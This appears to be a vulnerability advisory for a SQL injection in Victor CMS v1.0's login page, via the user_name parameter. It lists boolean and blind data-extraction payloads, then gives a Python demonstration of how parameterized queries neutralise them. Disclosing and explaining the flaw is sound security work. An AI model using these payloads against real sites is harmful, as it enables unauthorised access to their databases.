- VULNERABLE: A SQL injection vulnerability exists in VictorCMS. An attacker can inject SQL into the query in "/CMSsite/includes/login.php" via the "user_name" parameter.
- Product: Victor CMS v1.0
- Impact: Allows an attacker to inject queries and to access and disclose all data on the system.
- Payload Boolean true: test' or '1'='1
- Payload Boolean false: test' or '1'='2
- Payload exploit example: test' or (ascii(substr((select(database())),1,1))<127)--+-
- Proof of concept (POC):
- The status of the returned response differs depending on whether the user name is correct or not:
- Payload Boolean true: user_name=test'+or+'1'='1
- Payload Boolean false: user_name=test'+or+'1'='2
- Exploit:
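
The boolean difference described in the proof of concept, and the parameterized query that removes it, shown as an added example (not VictorCMS code). It assumes an in-memory SQLite database standing in for the CMS database; the `users` table, its columns and all function names are constructed for illustration.

```python
import sqlite3


def make_db():
    # Constructed schema and row; not taken from VictorCMS.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_name TEXT, user_password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'placeholder-hash')")
    return db


def lookup_concatenated(db, user_name):
    """Vulnerable pattern: the input is pasted into the SQL text."""
    sql = "SELECT user_name FROM users WHERE user_name = '" + user_name + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user_name):
    """Hardened pattern: the input is bound as data and never parsed as SQL."""
    sql = "SELECT user_name FROM users WHERE user_name = ?"
    return db.execute(sql, (user_name,)).fetchall()


def login_status(rows):
    # Stand-in for the differing response the advisory observes.
    return "user found" if rows else "user not found"


def compare(db):
    """Run the page's two boolean inputs through both query styles."""
    inputs = {"true": "test' or '1'='1", "false": "test' or '1'='2"}
    return {
        label: (
            login_status(lookup_concatenated(db, value)),
            login_status(lookup_parameterized(db, value)),
        )
        for label, value in inputs.items()
    }


if __name__ == "__main__":
    for label, (concat, bound) in compare(make_db()).items():
        print(f"{label:5}  concatenated: {concat:14}  parameterized: {bound}")
```

With concatenation the two inputs produce different outcomes, which is the signal the proof of concept relies on; with bound parameters both are treated as a literal, nonexistent user name and the outcomes are identical.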



